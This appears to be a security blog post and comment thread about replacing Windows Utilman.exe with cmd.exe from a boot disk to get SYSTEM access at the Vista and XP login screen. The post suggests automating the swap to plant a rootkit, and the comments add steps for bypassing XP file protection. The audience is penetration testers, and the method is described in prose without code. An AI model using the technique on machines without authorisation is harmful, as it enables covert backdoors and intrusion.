Edit: The real action’s going on down below here in the comments 
. Be sure to catch up on them after you read the post.
Jesse Varsalone, a computer forensics expert that happens to be a reader of this site, just emailed me a link to a cool video where he demonstrates a quick and easy way of obtaining SYSTEM privileges on a Vista system, given physical access to the machine. In the video, he uses BackTrack to replace Utilman.exe with a copy of cmd.exe . The nice thing about replacing Utilman.exe is that you can make it run before you’re even logged-in by pressing Windows-U. The video is available on the Offensive Security (maintainers of BackTrack) site:
If you’re into doing physical-presence penetration tests, you might want to roll your own custom CD or bootable USB drive that boots faster than BackTrack, and automatically swaps Utilman.exe out for the executable of your choice. Perhaps something that installs a nice rootkit or Core Impact agent, and then places the real Utilman.exe back into its rightful place.
Thanks Jesse! Excellent choice of soundtrack as well!
Big deal.. You can do this in 2000 and XP as well.
Pingback: /var/log/TuXeD » Blog Archive » Acceso System en Windows Vista
I’m sorry, but this is just stupid. If you have sufficient physical access to the computer to boot off a Linux boot disk, then, if there’s no encryption, you’ve got arbitrary read and write access to all the files on the machine — so why on earth is it a surprise that you’ve got admin access to it?!
Hell, you don’t even need to bother with a Linux boot disc — if you have physical access to a box, just press F8 on startup (/ on Linux, append S to the GRUB kernel line) and boot into single user mode.
The fact that Physical access -> Admin access is one of the fundamental, immutable laws of computer security. I can’t believe that this something like this was posted to a ‘security’ blog.
I agree that it’s not surprising, and that with physical access all bets are off. I simply hadn’t seen it done like this before, and thought it was a neat trick.
Not everything posted here is going to be groundbreaking, and I never claimed it would be. Sometimes it’s just like I said it was: a quick and easy trick that you might get some use out of.
Thanks for the comments!
Alright, I’ve eaten my breakfast and had a little more time to reflect on the comments.
First of all, thanks for mentioning that this works on 2k/XP, Marcin. I was under the impression, from the email I received about it, that it didn’t, however I just booted up an XP VM, and it seems that I can run Utilman with Windows-U before logging in on it too. It stands to reason that the same trick would work then.
And as for Simon, I reflected on your comment over my eggs and grits. You make some good points, and your facts are all straight. In the absence of good whole-disk encryption (with the disks unmounted and keys properly dealt with), physical access does mean admin access. I and most of my usual readers, have poked around in filesystems from a boot disk, reset passwords, etc.
You’re saying it’s stupid, but I think you may have gotten the wrong impression from the post. I apologize if it seemed like I was claiming it was a “surprise”, because I didn’t really intend to present it as a vulnerability or surprising result. That’s why, unlike the Slashdot article about the same video, I didn’t present it as a “vulnerability” or “security hole”, because it’s not, really.
It’s a clever trick, that I believe some practitioners who read this blog might be interested in. It’s the same thing as many pentesters are already doing with boot discs and such, only it has some desirable traits: Easy to automate a quick mount-and-replace, low impact on the system (if what you replace it with cleans up after itself by putting Utilman back).
So, I agree with you that it’s not surprising or a new vulnerability. I still think that it’s a nice trick to quickly deploy a backdoor or rootkit with physical access to the machine, despite the fact that it’s roughly equivalent to other things you might do (full-on boot cd’s and single user/safe mode).
The comments are great though: adds some value to the post and lets us expand upon it with some discussion. I hope you keep reading this ‘security’ blog, Simon
we did some playing with this at work and could not get it to work with XP.
anybody else actually try it and get it to work or just talking shizzle?
i did find this that said you had to do some dll patching
http://blog.didierstevens.com/2006/08/31/my-second-playdate-with-utilmanexe/
http://blog.didierstevens.com/2006/08/21/playing-with-utilmanexe/
I haven’t tried it with XP. Strange that XP would check to see if the file has been modified, if Vista doesn’t. Either way, as has been stated earlier in this discussion, if you can get on there to modify utilman, patching or replacing that dll while you’re on the filesystem is also doable.
Thanks for the links!
I’ve just read the original post again, and you’re right, you didn’t present it as a security hole, which was how I interpreted the post, and my comment was unnecessarily confrontational as a result; so apologies for that.
In my defense, I’d just spent an hour on Slashdot arguing about exactly this with a thousand monkeys at a thousand typewriters who thought it *was* a security hole, so I was probably predisposed to read that into your post (plus my blood was up
).
No worries. I was just happy someone cared enough about what was posted here to call me out on it!
For a tech blog that’s been around for so many eons, it’s fascinating how screwed up security-related posts can get on slashdot.
To get this working on XP, you need to do 2 things:
1) Disable Windows File Protection for utilman.exe. Otherwise, the original will be put back in the system32 folder. Vista still protects system files, but doesn’t fix them automatically like XP does.
2) Write a little C program that starts cmd.exe on the correct Windows station (WinSta0) and desktop (Winlogon). Have to find out why you don’t need to do this on Vista.